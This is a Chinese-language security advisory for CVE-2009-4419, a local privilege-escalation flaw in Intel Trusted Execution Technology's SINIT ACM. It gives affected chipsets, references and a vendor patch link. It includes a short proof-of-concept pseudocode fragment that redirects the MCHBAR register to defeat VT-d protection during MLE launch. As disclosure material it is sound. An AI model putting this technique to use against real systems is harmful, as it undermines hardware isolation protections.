Intel可信执行技术SINIT ACM本地权限提升漏洞


发布日期:2009-12-21
更新日期:2009-12-25

受影响系统:
Intel Q35
Intel GM45
Intel PM45 Express
Intel Q45
Intel Q43 Express
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 37430
CVE ID: CVE-2009-4419

英特尔可信执行技术是英特尔酷睿2双核处理器E8400中的一项硬件延展技术,旨在保护虚拟化计算环境中的数据免遭软件攻击、病毒入侵及其它类型威胁。

多个Intel芯片组的SINIT认证代码模块(ACM)中存在错误配置,允许本地用户将MCHBAR寄存器修改为指向受控的区域,在加载MLE期间SENTER指令无法正确地应用VT-d保护,以绕过可信执行技术的保护机制。

<*来源:Alexander Tereshkin
 
  链接:http://secunia.com/advisories/37900/
        http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00021&languageid=en-fr
        http://invisiblethingslab.com/resources/misc09/Another%20TXT%20Attack.pdf
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#define ETH_MEM 0xfef00000
#define FAKE_MCHBAR (ETH_MEM+0x10000)
#define NEW_MCHBAR ((1ULL<<32) +
FAKE_MCHBAR)
// map some memory above 0xfec00000...
pci_write_long (ETH_DEV, MBARA_REG,
ETH_MEM)
// copy original MCHBAR region there...
MCHBAR = pci_read_long (MCH_DEV,
MCHBAR_REG);
memcpy (FAKE_MCHBAR, MCHBAR&~1, 0x4000);
// do the trick!
DMAR = get_acpi_dmar_base();
DMAR.DRHD[3].BAR = DMAR.DRHD[0].BAR
*(FAKE_MCHBAR + 0xdc0) = DMAR.DRHD[3].BAR
// update MCHBAR...
pci_write_longlong (MCH_DEV, MCHBAR_REG,
NEW_MCHBAR | 0x1)

建议:
--------------------------------------------------------------------------------
厂商补丁:

Intel
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://sourceforge.net/projects/tboot/files/本安全漏洞由

相关内容